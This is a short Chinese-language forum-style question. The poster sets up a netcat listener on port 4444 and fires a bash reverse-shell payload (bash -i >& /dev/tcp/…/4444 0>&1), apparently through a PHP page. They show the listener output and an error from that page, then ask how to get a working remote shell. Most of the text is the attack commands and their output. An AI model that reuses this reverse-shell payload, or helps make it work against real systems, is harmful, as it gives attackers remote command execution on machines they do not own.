我在听一个连接:
nc -nlvp 4444
并使用:
调用反向shell有效负载bash -i >& /dev/tcp/xx.xx.x.xx/4444 0>&1 *
我的nc
听众然后给了我:
listening on [any] 4444 ...
connect to [xx.xx.x.xx] from (UNKNOWN) [xx.xx.x.xx] 55759
bash: no job control in this shell
alldocs.php: line 1: *Everyones: command not found
是什么给出的?如何让它调用实际的反向shell?
谢谢。